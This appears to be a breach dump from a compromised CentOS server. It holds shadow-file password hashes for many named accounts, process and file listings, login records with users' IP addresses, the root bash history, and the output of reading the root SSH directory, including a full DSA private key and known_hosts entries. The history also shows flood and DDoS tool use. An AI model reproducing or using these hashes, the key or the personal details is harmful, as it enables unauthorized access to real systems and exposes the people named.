-mycorp:$1$7PzKv9I_$SdcZN/fvAe5M1/g.nV3Ve/:13727:0:99999:7::: -ragedns:$1$0ZhTdSDG$8tIyV/igSTp2FW1DLg0bI.:13727:0:99999:7::: -shoutcas:$1$EyPac5O4$twiXOZ2pCQF2N02Yn1ysF/:13732:0:99999:7::: -g00ns83:$1$11pX9sPu$10H8SuDhVaqzctQl1hK/T.:13985:0:99999:7::: -avahi:!!:13728:::::: -xfs:!!:13728:::::: -bnc:$1$oJ272Xoy$A/YVfI3PIEVShTgTfBKVY1:13729:0:99999:7::: -felosi:$1$nsjb27Ih$r4cu3KkmTBUcHBnpKlcAd/:13729:0:99999:7::: -egg:$1$IhIgFiwf$ZbLk7EMZ2mW9h5SZ.mibv.:13735:0:99999:7::: -dougie:$1$xSp9e8mS$aiGml3legHEIUPrB5zyNp/:13737:0:99999:7::: -proc:!!:13748:0:99999:7::: -cstest:$1$ocq0fShx$6dKqaaMhVyvob5DW5sBeK1:13859:0:99999:7::: -partyvan:!!$1$lGkCPwxP$aaKltWujl.3mkQjqgKJ311:13864:0:99999:7::: -40zzz:$1$I1xSLk9k$0.mmuo5Si8UlQXaUJ4VRF1:13869:0:99999:7::: -tflux:$1$ftEvmzkA$RlkyQtPH.ebC0J8lWiZxm/:13875:0:99999:7::: -hthhost:$1$sdsbg7Bd$UaK2rXwsmZjwQYV8/4FUa1:13877:0:99999:7::: -party:$1$f2EVqqGx$H/sktpSQFCpoOz8tQpNsu/:13912:0:99999:7::: -silc:$1$dhGqC6Gf$UEHea6QzCwrkfB8ZB2gDV1:13897:0:99999:7::: -ident:!!:13910:0:99999:7::: -lost:$1$5EpPopQR$0klUI/mKzjxPR0CV7qp2f/:13926:0:99999:7::: -cunt:$1$7EyJ/1Qa$4Xy96JHb7dRjxxq.FDCsQ0:13947:0:99999:7::: -tribal:$1$qF0PcFfr$76GBdRhLgM5lEGpjZQLPL1:13947:0:99999:7::: -sixtyz:$1$9oLYqc3p$.KffXrzMGVAQ2bdOrgkoY1:13986:0:99999:7::: -hanon:$1$oQBfvCtT$LymNfsGG9wHkUwKn41Cim/:13961:0:99999:7::: -pvannet:$1$hYiASnKV$.CxXbIqEMR6kAoRRKVLfo1:13965:0:99999:7::: -[root@demon2 ~]# ps auxwww | grep -v root | grep -v mysql -USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND -ftp 2319 0.0 0.0 2736 1424 ? Ss Mar18 0:00 proftpd: (accepting connections) -dbus 3183 0.0 0.0 2784 672 ? Ss Feb11 0:00 dbus-daemon --system -mail 3813 0.0 0.0 8760 712 ? Ss Feb11 0:36 /usr/sbin/exim -bd -q15m -oP /var/run/exim.pid -avahi 4434 0.0 0.0 2600 648 ? Ss Feb11 0:00 avahi-daemon: running [demon2.local] -68 4450 0.0 0.0 5276 736 ? Ss Feb11 0:00 hald -named 4618 0.0 0.4 48712 8296 ? Ssl Feb11 55:55 /usr/sbin/named -u named -bnc 5470 0.0 0.0 5568 1560 ? S Feb11 0:53 ./psybnc -apache 12745 0.0 0.3 113532 7368 ? Ss Apr16 0:00 lsphp -c /usr/local/lib -bnc 14297 0.0 0.1 5544 2144 ? S Apr19 0:04 ./psybnc psybnc.gso.conf -nobody 15071 0.0 0.0 8708 1292 ? Ss Apr01 0:00 /usr/local/directadmin/directadmin d -510 16899 0.0 0.1 6728 3232 ? S Apr14 0:00 /home/excodeirc/Unreal3.2/src/ircd -evilcode 17493 0.0 0.8 19904 17704 ? S Apr19 1:08 /home/evilcode/newircd/Unreal3.2.7/src/ircd -egg 20683 0.0 0.2 17204 5172 ? Sl Apr14 7:14 ./eggdrop-1.6.18 v0ltr0n.conf -egg 20745 0.0 0.1 13380 3432 ? Sl Apr14 0:02 ./eggdrop sentry.conf -egg 20748 0.0 0.1 13544 3420 ? Sl Apr14 0:00 ./eggdrop boneless.conf -egg 20758 0.0 0.1 13404 3396 ? Sl Apr14 0:00 ./eggdrop keebler.conf -egg 20770 0.0 0.1 4412 3428 ? Ss Apr14 0:31 /home/egg/efnet/fight hacker -egg 20773 0.0 0.1 3548 2588 ? Ss Apr14 0:19 /home/egg/efnet/fight logic -egg 20776 0.0 0.1 3588 2692 ? Ss Apr14 0:17 /home/egg/efnet/fight bloo -egg 20779 0.0 0.1 3552 2640 ? Ss Apr14 0:18 /home/egg/efnet/fight etho -egg 20793 0.0 0.1 3564 2720 ? Ss Apr14 0:17 /home/egg/efnet/fight notgay -egg 20798 0.0 0.1 3576 2676 ? Ss Apr14 0:24 /home/egg/efnet/fight hthbot -513 23089 0.0 0.1 73380 2388 ? SNl Apr16 0:26 ./server_linux -513 23913 0.0 0.2 50844 5016 ? SNl Apr16 0:00 ./server_linux -PID=tsserver2.pid -apache 28366 0.0 0.6 121208 14104 ? S 13:11 0:00 lsphp -c /usr/local/lib -nobody 29950 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d -nobody 29960 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d -g00ns83 29999 0.0 0.5 114628 10976 ? S 13:26 0:00 lsphp -c /usr/local/lib -sn00g3s 30011 0.9 0.5 114844 11788 ? S 13:26 0:00 lsphp -c /usr/local/lib -every 30024 1.6 0.5 114452 12264 ? S 13:26 0:00 lsphp -c /usr/local/lib -nobody 30111 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d -nobody 30168 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d -nobody 30170 0.0 0.0 8708 572 ? S Apr20 0:00 /usr/local/directadmin/directadmin d -apache 32186 0.0 0.6 16400 12960 ? S Apr16 4:36 lshttpd -[root@demon2 ~]# ls -al -total 18128 -drwxr-x--- 14 root root 4096 Mar 27 16:14 . -drwxr-xr-x 27 root root 4096 Mar 11 00:10 .. --rw-r--r-- 1 root root 16777216 Sep 17 2004 16mb.test.file.zip --rw------- 1 root root 1077 Jul 31 2007 anaconda-ks.cfg -drwxr-xr-x 2 root root 4096 Sep 13 2007 ani --rw------- 1 root root 9305 Apr 21 13:23 .bash_history --rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout --rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile --rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc --rw-r--r-- 1 root root 337529 Apr 17 2006 Bastille-3.0.9-1.0.noarch.rpm -drwxrwxrwx 5 1000 1000 12288 Mar 17 19:47 c-ares-1.5.1 --rw-r--r-- 1 root root 445312 Nov 21 02:14 c-ares-1.5.1.tar.gz --rw-r--r-- 1 root root 20136 Dec 19 19:30 cores -drwxr-xr-x 4 root root 4096 Feb 23 19:17 .cpan -drwxr-xr-x 5 root root 4096 Feb 10 12:56 csf --rw-r--r-- 1 root root 238005 Jan 21 09:19 csf.tgz --rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc -drwx------ 2 root root 4096 Jan 25 16:29 .elinks --rw-r--r-- 1 root root 8192 Jan 6 17:37 flood --rw-r--r-- 1 root root 13333 Jul 31 2007 install.log --rw-r--r-- 1 root root 2551 Jul 31 2007 install.log.syslog --rw-r--r-- 1 root root 12033 Jan 6 17:30 ips --rw------- 1 root root 45 Apr 19 14:04 .lesshst -drwxr-xr-x 4 root root 4096 Dec 31 01:35 lynis --rw-r--r-- 1 root root 46388 Dec 26 11:13 lynis-1.0.6.tar.gz --rw-r--r-- 1 root root 754 Feb 10 17:12 Makefile --rw-r--r-- 1 root root 0 Feb 10 17:12 Module.symvers --rw------- 1 root root 41 Jan 31 02:49 .my.cnf --rw------- 1 root root 419 Sep 29 2007 .nessusrc --rw-r--r-- 1 root root 51 Sep 29 2007 .nessusrc.cert --rw-r--r-- 1 root root 656 Jan 6 17:37 new --rw-r--r-- 1 root root 656 Jan 6 17:38 new1 -drwxr-xr-x 3 root root 4096 Mar 25 13:40 newircd --rw-r--r-- 1 root root 1462 Aug 19 2007 opt.php --rw-r--r-- 1 root root 3502 Feb 10 16:03 ptpatch2008.c --rw-r--r-- 1 root root 5704 Feb 10 17:12 ptpatch2008.ko --rw-r--r-- 1 root root 126 Feb 10 17:12 .ptpatch2008.ko.cmd --rw-r--r-- 1 root root 870 Feb 10 17:12 ptpatch2008.mod.c --rw-r--r-- 1 root root 3404 Feb 10 17:12 ptpatch2008.mod.o --rw-r--r-- 1 root root 11168 Feb 10 17:12 .ptpatch2008.mod.o.cmd --rw-r--r-- 1 root root 3080 Feb 10 17:12 ptpatch2008.o --rw-r--r-- 1 root root 16774 Feb 10 17:12 .ptpatch2008.o.cmd -drwxrwxr-x 3 666 666 4096 Sep 22 2007 rkhunter-1.3.0 --rw-r--r-- 1 root root 252011 Sep 22 2007 rkhunter-1.3.0.tar.gz --rw------- 1 root root 1024 Jan 31 05:43 .rnd -drwxr-xr-x 4 1000 1000 4096 Nov 29 14:48 rootcheck-0.7 --rw-r--r-- 1 root root 42488 Mar 17 2006 rootcheck-0.7.tar.gz -drwx------ 2 root root 4096 Feb 10 12:55 .ssh -drwxr-x--- 2 root root 4096 Dec 11 17:39 .steam --rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc -drwxr-xr-x 2 root root 4096 Feb 10 17:12 .tmp_versions --rw-r--r-- 1 root root 42596 Aug 9 2007 tuning-primer.sh --rw-r--r-- 1 root root 11623 Jan 6 17:36 udpflood --rw-r--r-- 1 root root 12033 Jan 6 17:30 udpips -[root@demon2 ~]# last -n 30 -root pts/1 74-34-107-191.ds Mon Apr 21 03:44 - 13:23 (09:39) -andrei@t ftpd27076 99.146.188.71 Sun Apr 20 17:01 - 17:07 (00:05) -andrei@t ftpd21033 99.146.188.71 Sun Apr 20 16:06 - 16:11 (00:05) -andrei@t ftpd18185 99.146.188.71 Sun Apr 20 15:40 - 15:56 (00:15) -andrei@t ftpd14422 99.146.188.71 Sun Apr 20 15:04 - 15:20 (00:16) -every ftpd13689 76.189.145.31 Sun Apr 20 09:56 - 10:03 (00:07) -bnc pts/1 78.129.174.155 Sat Apr 19 20:27 - 20:31 (00:04) -bnc pts/1 78.129.174.155 Sat Apr 19 17:53 - 18:39 (00:45) -bnc pts/2 78.129.174.155 Sat Apr 19 15:03 - 15:06 (00:02) -root pts/2 ip70-180-48-83.b Sat Apr 19 10:35 - 11:25 (00:50) -every ftpd20255 76.189.145.31 Fri Apr 18 15:42 - 15:42 (00:00) -every ftpd18019 76.189.145.31 Fri Apr 18 15:26 - 15:41 (00:15) -root pts/0 fl-71-51-173-254 Wed Apr 16 19:52 - 20:43 (00:50) -andrei@t ftpd32363 99.146.188.71 Wed Apr 16 17:33 - 17:37 (00:04) -root pts/0 fl-71-51-173-254 Wed Apr 16 17:28 - 19:09 (01:41) -andrei@t ftpd30547 99.146.188.71 Wed Apr 16 17:18 - 17:29 (00:11) -andrei@t ftpd30546 99.146.188.71 Wed Apr 16 17:18 - 17:23 (00:05) -root pts/0 fl-71-51-173-254 Tue Apr 15 21:14 - 21:57 (00:42) -root pts/0 fl-71-51-173-254 Mon Apr 14 22:23 - 23:11 (00:47) -root pts/0 fl-71-51-173-254 Mon Apr 14 13:46 - 14:28 (00:42) -kl@60z.o ftpd10215 77.221.133.186 Mon Apr 14 00:32 - 00:32 (00:00) -andrei@t ftpd19694 99.146.188.71 Sun Apr 13 20:40 - 20:45 (00:05) -andrei@t ftpd12210 99.146.188.71 Sun Apr 13 19:22 - 19:36 (00:13) -andrei@t ftpd10428 99.146.188.71 Sun Apr 13 19:03 - 19:11 (00:07) -andrei@t ftpd9290 99.146.188.71 Sun Apr 13 18:52 - 18:57 (00:05) -andrei@t ftpd9291 99.146.188.71 Sun Apr 13 18:52 - 18:57 (00:05) -root pts/0 ip70-180-48-83.b Sat Apr 12 11:39 - 11:40 (00:00) -root pts/0 ip70-180-48-83.b Sat Apr 12 10:02 - 10:06 (00:03) -root pts/0 fl-71-51-173-254 Thu Apr 10 13:32 - 13:45 (00:12) -root pts/0 fl-71-51-173-254 Mon Apr 7 17:43 - 18:36 (00:53) - -wtmp begins Sun Mar 2 09:43:08 2008 -[root@demon2 ~]# cat /etc/issue -CentOS release 5 (Final) -Kernel \r on an \m - -[root@demon2 ~]# cat .bash_history -w -passwd g00ns83 -top -w -cd /home -ls -ls pr0be -cd g00ns83 -ls -cd public_html -ls -nano in.php -ls katalyst/ -nano includes/config.php -nano includes/config.php -chown includes/config.php g00ns83 -chown g00ns83 includes/config.php -ls includes -ls -o includes -ls -ls -o -ls image -o -ls -o image -chown g00ns83 * -ls -ls -cd / -ls -makeuser cunt -adduser cunt -passwd cunt -s -ls -cd /home/sn00g3s -cd public_Html -cd public_html -ls -mkdir hid -nano hid/index.php -chown sn00g3s -chown sn00g3s * -ls -ls -o -ls hid -rm -rf hid -cd /home/g00ns83/public_Html -cd /home/g00ns83/public_html -ls -mkdir tribal -cd tribal -nano index.php -rm index.php -nano index.php -rm index.php -nano index.php -rm index.php -nano index.php -cd /home/g00ns83 -chown g00ns83 * -w -ls -o -cd /home -passwd cunt -cd /home/cunt -ls -wget http://www.shoutcast.com/downloads/sc1-9-8/sc_serv_1.9.8_Linux.tar.gz -ls -tar -xzf sc_serv_1.9.8_Linux.tar.gz -ls -nano sc_serv.conf -sudo cunt -su cunt -ls -cd unrealold/ -ls -cd /home/excodeirc -ls -cd Unreal -cd Unreal3.2 -ls -nano unrealircd.conf -ls -ls -o -cd /home/evilcodeirc -cd /home -ls -cd evilcode -ls -cd Unreal3.2/ -ls -nano unrealircd.conf -cd /home/excodeirc -cd Unreal3.2 -ls -nano unrealircd.conf -ls -o -cd /hom -ls -cd /home -ls -ls -o -ls tmp -ls asbestos -cd asbestos -cd domains -ls -cd asbestosbeware.org -ls -cd / -ls -w -ls tmp -ls -ps -aux | grep ircd -netstat | grep ircd -ls -netstat -ddos -ddos -csf -d 24.3.92.79 -nano /etc/csf/csf.allow -csf -d 24.3.92.79 -csf -r -csf -d 24.3.92.79 -csf -csf -c -csf -r -csf -d 24.3.92.79 -nano /etc/csf/csf.allow -csf -d 24.3.92.79 -ddos -syn -synall -ls -ls -o -ls root -cd /home/pr0be -ls -rm -rf irssi-0.8.12 -rm irssi-0.8.12.tar.gz -ls -userdel -userdel -f pr0be -cd /home -ls -useradd tribal -passwd -ls -chown cunt * -su cunt -w -passwd tribal -ls -nano /etc/passwd -cd /home/tribal -ls -su tribal -ls -cd /home/tribal -ls -su tribal -ls -w -cd / -ls -nano /etc/csf/csf.deny -csf -r -cd /home -ls -cd excodeirc/ -ls -cd Unreal -cd Unreal3.2 -ls -nano unrealircd.conf -nano unrealircd.conf -cd /home -ls -cd evilcode/ -ls -cd Unreal3.2/ -ls -nano unrealircd.conf -make install -su tribal -w -ls -who -cd /home/excodeirc -ls -cd Unreal3.2 -ls -nano unrealircd.conf -cd /home/evilcodeirc -cd /home/evilcoders -cd /home -ls -cd evilcode/ -ls -cd Unreal3.2/ -ls -nano unrealircd.conf -nano unrealircd.conf -cd /home/excodeirc -ls -cd Unreal3.2 -ls -nano unrealircd.conf -nano unrealircd.conf -nano /etc/csf/csf.deny -csf -a 24.205.142.108 /etc/csf -w -ddos -ddos -csf -r -syn -ls -ls -w -ddos -netstat -w -who -ls -cd / -ls -ls etc -ls var -ls bin -ls * | grep ddos -synd -ls -nano /etc/csf/csf.deny -nst | grep 72.20.26.211 -netstat | grep 72.20.26.211 -tcodump -nn -vv 72.20.26.211 -tcpdump -nn -vv 72.20.26.211 -netstat | grep 72.20.26.211 -w -netstat | grep 72.20.26.211 -w -dos -ls -ddos syng -ddos synd -ps -aux -kill -9 5174 -ls -ps -aux -ls -ls /home -ls -cd /home/evilcode -ls -cd Unreal3.2 -ls -./unreal -./unreal start -ps -aux -kill -9 3549 -ps -aux -ls -ls ../ -ls -ls ../../ -su evilcode -ps -aux -ps -aux -ls -cd ../ -ls -cd ../ -ls -cd evilcode -ls -cd Unreal3.2 -ls -nano unrealircd.conf -ls -cd ../../ -ls -cd excodeirc -ls -cd Unreal3.2 -ls -nano unrealircd.conf -su excodeirc -w -cd /home/excodeirc -netstat -ls -cd Unreal3.2 -ls -nano unrealircd.conf -csf -d 79.126.130.156 -w -ls -./unreal stop -./unreal start -nano unrealircd.conf -cd /home/evilcoder -cd /home -ls -cd evilcode/ -ls -cd Unreal3.2/ -ls -nano unrealircd.conf -cd /home/excodeirc -ls -cd Unreal3.2 -ls -nano unrealircd.conf -nano unrealircd.conf -cd /etc/csf -ls -nano csf.deny -nano unrealircd.conf -cd /home/excodeirc/Unreal3.2 -ls -nano unrealircd.conf -nano unrealircd.conf -ls -cd /home -ls -cd pr0be/ -ls -su pr0be -ls -su pr0be -nano etc/passwd -nano /etc/passwd -cd /home/tribal -su tribal -ls -cd /root -ls -wget -http://daniel.haxx.se/projects/c-ares/c-ares-1.5.1.tar.gz -wget http://daniel.haxx.se/projects/c-ares/c-ares-1.5.1.tar.gz -ls -tar -xzf c-ares-1.5.1.tar.gz -ls -cd c-ares-1.5.1 -ls -./configure -ls -cat README -make -cat README -make install -ls -cd /home/tribal -su tribal -w -cd /home/excodeirc -ls -cd Unreal3.2 -ls -./unreal stop -nano unrealircd.conf -./unreal start -cd /home -ls -cd evilcode/ -ls -cd Unreal3.2/ -ls -nano unrealircd.conf -ls -cd /home/excodeirc -ls -cd Unreal3.2 -ls -nano unrealircd.conf -cd /home/excodeirc -ls -mkdir BULLSHIT -ls -rm -rf denora-1.2.0-RC4 -rm denora-1.2.0-RC4.tar.gz -ls -ls psybnc -rm psybnc/ -ls -rm -rf psybnc/ -ls -rm -rf BULLSHIT/ -ls -cd /home/evilcode -ls -cd Unreal3.2/ -ls -nano ircd.motd -chown evilcode * -cd /home/excodeirc -cd Unreal3.2 -ls -chown excodeirc * -nano unrealircd.conf -ls -ls -w -cd / -nano unrealircd.conf -ls -ls /root -ddos -netstat -ddos -syn -synd -ddos -csf -d 218.186.12.8 -ddos 10 -ddos -ddos -ddos -ddos -csf -csf -c -csf -l -w -w -cd / -ls -w -netstat -ls -cd /home/evilcode -ls -cd unreal3.2 -cd Unreal3.2 -ls -nano unrealircd.conf -cd ../ -ls -cd ../ -ls -cd excodeirc -ls -cd Unreal3.2 -ls -nano unrealircd.conf -dmesg -top -sh tuning* -top -clear -top -w -ls -cd /home -ls -cd excodeirc -ls -mkdir hightechhost -cd hightechhost/ -ls -wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.18.tar.gz -ls -tar zxvf eggdrop1.6.18.tar.gz -cd eggdrop1.6.18 -./configure -make config -make -ls -su excodeirc -chown excodeirc * -su excodeirc -w -ls -cd /home -ls -cd excodeirc -ls -cd hightechhost/ -ls -cd eggdrop1.6.18 -ls -ls -o -su excodeirc -ls -cd / -ls -cd home -ls -cd egg -ls -cd eggdrop -ls -su egg -uname -a -id egg -su egg -netstat | grep 33162 -netstat -killall fight -netstat -killall fight -ps -aux -su egg -netstat -uname -a ; id egg -su egg -ls -cd /home/egg -ls -cd efnet/ -su egg -w -w -ls -cat cores -ls -cd /home -ls -cd evilcode/ -ls -cd Unreal3.2/ -ls -nano unrealircd.conf -nano unrealircd.conf -nano unrealircd.conf -nano unrealircd.conf -nano unrealircd.conf -nano unrealircd.conf -nano unrealircd.conf -cd /home/excodeirc -ls -cd Unreal -ls -cd Unreal3.2 -ls -nano unrealircd.conf -cd /home/evilcode -ls -cd Unreal3.2/ -ls -nano unrealircd.conf -cd /home/excodeirc -ls -cd Unreal3.2 -ls -nano unrealircd.conf -cd /home/evilcode -ls -cd Unreal3.2/ -ls -nano unrealircd.conf -./Config -make -./unreal stop -./unreal start -ps -aux | grep ircd -kill 3952 -kill 10281 -ps -aux -kill 12472 -killall ircd -./unreal start -ls -./Config -make -./unreal start -cd $user -ls -mkdir newircd -cd newircd -ls -wget http://www.blurryfox.com/unreal/Unreal3.2.7.tar.gz -ls -tar xzf Unreal3.2.7.tar.gz -ls -cd Unreal3.2.7 -ls -./Config -ls -cd /home -ls -cd evilcode/ -ls -su evilcode -w -w -ps -aux | grep ircd -ls -cd /home -ls -cd evilcode/ -ls -cd newircd/ -ls -su evilcode -w -ls -cd / -ls -cd evilcode -ls -cd /home -ls -w -cd evilcode/ -ls -w -netstat -a -la -ls -su evilcode -ls -su evilcoder -su evilcode -ls -who -cd / -cd /home -ls -cd evilcode -ls -cd newircd/ -ls -cd Unreal3.2.7 -ls -su evilcode -w -ls -cd / -ls -cd /home/evilcode -ls -cd newircd -ls -cd Unreal3.2.7 -ls -nano unrealircd.conf -ls -cd / -ls -cd home -ls -cd excodeirc/ -ls -cd Unreal3.2 -ls -nano unrealircd.conf -./unreal stop -./unreal start -./unreal start -./unreal stop -nano unrealircd.conf -./unreal start -./unreal stop -uptime -./unreal stop -nano unrealircd.conf -w -passwd sn00ges -passwd sn00g3s -cat ircd.conf -cat ircd.log -netstat -a -nst -netstat -a -w -ls -w -cd / -ls -cd evilcode -cd /home -ls -cd evilcode/ -ls -cd newircd/ -su evilcode -csf -a 71.105.242.232 /etc/csf -last | grep root -nst -cat /boot/grub/grub.conf -cd /usr/src -ls -rm -rf linux* -wget sstdns.com/kernel.tar.gz -wget nix101.com/kernel.tar.gz -tar zxvf kernel.ta.gz -tar zxvf kernel.tar.gz -ln -s linux-2.6.24.3 linux -cd linux -rm -rf .config -wget sstdns.com/grsec -mv grsec .config -screen -w -ps -aux ; grep ircd -cd /home -cd evilcode -ls -su evilcode -w -ls -cd / -ps -aux -kill 19912 -kill 11341 -ps -aux -kill 11341 -kill 11341 -ps -aux -kilall fight -kill fight -kill 3534 -kill 3537 -kill 3540 -kill 3543 -kill 3546 -kill 3549 -ps -aux -kill 1439 -kill 1499 -ps-aux -ps -aux -w -ddos -netstat -a -ls -ls home -cd home -ls -ls pvannet -ls pvannet/public_html -ls -ls aosw -ls aosw/public_html -csf -a 63.173.63.241 /etc/csf -nano /etc/csf/csf.deny -ping 63.173.63.241 -tracert 63.173.63.241 -ls -w -cd /home -ls -cd g00ns83 -ls -ls public_html/ -ls -cd / -ls -cd home -ls g00ns83/backup -mv g00ns83/backup/oldlayout g00ns83/public_html -w -cd /home/evilcode -cd newircd/ -su evilcode -ddos -syn -netstat -netstat -a -ddos -ddos 10 -ls -csf -r -ls -nano /etc/csf/csf.deny -ls -cd / -l -ls -cd / -ls -cd /evilcode -ls -cd /home/evilcode -ls -cd newircd/ -ls -cd Unreal3.2.7 -su evilcode -w -cd / -cd /home -ls -cd evilcode/ -ls -cd newircd/ -ls -cd Unreal3.2.7 -ls -su evilcode -ls -cd ../../ -ls -ls evilcode -ls -ps -aux -ls -cd /home -ls -cd evilcode -ls -cd Unreal3.2 -ls -ps -aux -ls -su evilcode -cd /home/evilcode -ls -cd newircd -ls -cd unreal3.2.7 -cd Unreal3.2.7 -ls -su evilcode -ls -w -cd / -ls -cd /home -cd evilcode/ -ls -cd newircd -l -ls -cd Unreal3.2.7 -ls -su evilcode -ls -cd / -ls -cd home -ls -cd excodeirc/ -ls -mv Unreal3.2 privateirc -ls -mv privateirc/ Unreal3.2 -cp Unreal3.2 privateircd -ls -cp Unreal3.2 privateircd -ls Unreal -ls Unreal3.2 -su excodeirc -ls -cd / -cd /home -ls -cd egg/ -ls -cd eggdrop -ls -nano v0ltr0n.conf -nano v0ltr0n.chan -./eggdrop-1.6.18 v0ltr0n.conf -su egg -w -passwd g00ns83 -w -ls -cd / -su -ls -make install -su sixtyz -su sixtyz -ls -cd /home/sixtyz -ls -mkdir wee -cd wee -su sixtyz -ls -su sixtyz -ls -cd / -su sixtyz -su sixtyz -ls -cd / -ls -cd /home -ls -cd g00nsts395/ -ls -cd ts -ls -su g00nsts395 -ls -ps -aux -cd /home -ls -cd evilcode -ls -cd newircd -ls -cd Unreal3.2.7 -ls -nano unrealircd.conf -su evilcode -up -last -last \ grep root -cd /var/log/httpd/domains -ls -cat g00ns.net.log | grep 403 -cat g00ns.net.log -cat g00ns.net.log | grep http -cat g00ns.net.log | grep regime -cat g00ns.net.log | grep c99 -cat g00ns.net.log | grep shell -cat g00ns.net.log | grep 406 -cat g00ns.net.log | grep 403 -htc -cat g00ns-forum.net.log | grep 403 -[root@demon2 ~]# ls -al .ssh -total 24 -drwx------ 2 root root 4096 Feb 10 12:55 . -drwxr-x--- 14 root root 4096 Mar 27 16:14 .. --rw------- 1 root root 668 Jul 31 2007 id_dsa --rw-r--r-- 1 root root 612 Jul 31 2007 id_dsa.pub --rw-r--r-- 1 root root 2630 Apr 14 11:40 known_hosts -[root@demon2 ~]# cat .ssh/* ------BEGIN DSA PRIVATE KEY----- -MIIBugIBAAKBgQCr+zFL0Hd8ONiBNi9HwL/rgZcyIi/cHbbhZ/Sra2AaDfSFivL5 -XmtmaFgSVPbxCLWgxCtM8E8MGX/T/c/A2EFwqHfXgjLAyMNBuKDfumVYMwH51smL -u5FrJhjt4qRgPnnG3W5Y1BkyoX28HvgnYHVNIGXcXe7GTutcIyGrrmYDNQIVAIKN -sRm7Oi3Ql4Nc9/R997aQiZpNAoGAeDuTtliW+zn9ki5EKTVZCTM0EhGxarDF8JOz -6JPfAlCpHEBtpNkQwmM1Gi8/XHPmAfDnNV0Na02XruhNk1UnWITBlqdU73Q413zx -LkWtyoPLECz2ySjpbTtatkcOTlDKroyZBxBEZPd3zLNClWfKAbW3mj02Pp5eMA11 -eSfZoV8CgYAysoncbc8l0WCVF5+NF84bfbRCYLCzMKq7e4kVoyGwGcoVHjVihRa+ -n/UmWxQx7Q4+DiuzzpyTFnSjUUlsxwnYXyg+9pswgyKi0FHxR01S+2b0laQNwnJp -xp6T7yuSKLG3PacwFo+WWgVlMm7lafZHjKYBm0TE3ZdnBq3EM1TsbAIUeUGslYXH -8q7BsyrkvGrDpQAhjSI= ------END DSA PRIVATE KEY----- -ssh-dss AAAAB3NzaC1kc3MAAACBAKv7MUvQd3w42IE2L0fAv+uBlzIiL9wdtuFn9Kt -rYBoN9IWK8vlea2ZoWBJU9vEItaDEK0zwTwwZf9P9z8DYQXCod9eCMsDIw0G4oN+6ZV -gzAfnWyYu7kWsmGO3ipGA+ecbdbljUGTKhfbwe+CdgdU0gZdxd7sZO61wjIauuZgM1A -AAAFQCCjbEZuzot0JeDXPf0ffe2kImaTQAAAIB4O5O2WJb7Of2SLkQpNVkJMzQSEbFq -sMXwk7Pok98CUKkcQG2k2RDCYzUaLz9cc+YB8Oc1XQ1rTZeu6E2TVSdYhMGWp1TvdDj -XfPEuRa3Kg8sQLPbJKOltO1q2Rw5OUMqujJkHEERk93fMs0KVZ8oBtbeaPTY+nl4wDX -V5J9mhXwAAAIAysoncbc8l0WCVF5+NF84bfbRCYLCzMKq7e4kVoyGwGcoVHjVihRa+n -/UmWxQx7Q4+DiuzzpyTFnSjUUlsxwnYXyg+9pswgyKi0FHxR01S+2b0laQNwnJpxp6T -7yuSKLG3PacwFo+WWgVlMm7lafZHjKYBm0TE3ZdnBq3EM1TsbA== -root@server.domain.com -72.20.5.94 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAz6mhC9bjyFZ4EYXzRu2C -Z8QLdxeSm9z5Y4svIrDM7xWD11MsWArRV6FAdb29NKCTVGu4Bn/jZmvjzG0W8mSd1b4 -AzdOm/T24+nGdfgKujuTonEHO3xMPomTdvmYsKYgn7JYboa5meUXD2hJJZ/nZUq2aSe -7ByYsS5vCEsBHGIv0= -69.42.223.17 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAx8MbaIB8gbYx6GMEEO -jwSfkeq4n/8c5erPuGuQH/oJUkU6DD1KDkqKwptS4PkiAMZVV93tU/VBo3MT1i0YVQl -TRWyg8sKuwsNv0f0x0day2qsoz0lSNYnjKXWYLqT1qryv1slI4BXuQB1jhr5dARBmVL -+YCNx6OSxvt7Q9m0JwtTqQayOm6Zcab/H3pm97nrYKRRxX3ikdXJdnekCwJw5BPZcyp -dqLlowB9hbVijWVnVZAYg96HssBRR6WxxNAPOLmCj/8bx4fLnNHu2F9tLdcNyzGMUuD -bLxYI+06Nwtk3fovpKwo+b/DmfcHaF4Lkm96pWpuhc6oduxh6ySvlviw== -halturnershow.com,208.53.158.3 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA -7ry8evVeuNNH0+p9VXPMqqPgp9NjMx/EDUj7hnGwreKYWyCybTitmpGgTDFTuu8YZGA -r+ssHoF2FMkr1lTF82IIsMx+EXMkoQJ0/SvMBO/gJiIsBRTU13n6Ad8FQZBCBez0dkz -RI0msupnbWnytPvqu9j0/pErPzaGWrINB+6N63Cs241GU6Lt8EG6RX4UVgBTSm8aold -+Ixpy+lmwTh3CNJu5zFtoCmmg7rCiQ7sn8ci4Rqq6YzV7LhzRyIiGRzH448v3/dDaUa -f2ENIvycEz27ZezeB2g5B5icTPH+VQNhqTohEtoQec0vHqA9CzSExXufDlS4is+F7dJ -LcA0Tnw== -74.86.141.218 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAuSVqCiY8KhmN3OHYH -lu03zkoGIMIGQPaM0bM6alUQPl7H7iAF9WOqaQ7OjpsBxvQO7/tchkP9Azy40W428OK -gg61XDrJoy/fBnOXAmvAKj42N7l3engj9P7MN229DDH0ygM/o1ykP7bob5MZx5BSzFu -DYaQtK+OhuhbsNiXOGCtIXPQ6XLRSo72GKoFzT4Y1Kc/Pux0lXrA7JrX8cOw24TgkQ1 -4Xh9vWRUXnxlq2HkrLT2VPrJ50Rl4feDSScqGyvXtQDuWrIsLdk5sA9EhIIqYbYsJUU -oHcIh30tOyOUoPcg3KTbk7gcInMGl3k7IOTZHI17wqOiNu1qIWYcGr1Tw== -apu.711chan.org,89.46.37.242 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAnv 